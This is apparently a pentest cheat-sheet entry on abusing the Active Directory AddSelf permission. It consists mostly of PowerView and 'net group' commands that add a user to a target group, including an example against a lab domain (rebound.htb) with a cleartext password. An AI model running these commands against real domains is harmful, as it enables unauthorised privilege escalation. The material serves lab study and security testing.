AddSelf
Information
The principal has the ability to add itself to the target group.
Exploitation
Add User to Group
This can be done natively (opsec considerations) or with PowerView.
# connect to the DC
powerview rebound.htb/oorend:'1GR8t@$$4u'@rebound.htb -k
# add user to the group
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
# confirm group membership
PV > Get-DomainGroupMember -Identity servicemgmt# add user to the group
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
# confirm group membership
Get-DomainGroupMember -Identity '<GROUP>'# add user to the group
net group '<GROUP>' '<USER>' /add /domain
# confirm group membership
net group <GROUP> /domainResources
Last updated
Was this helpful?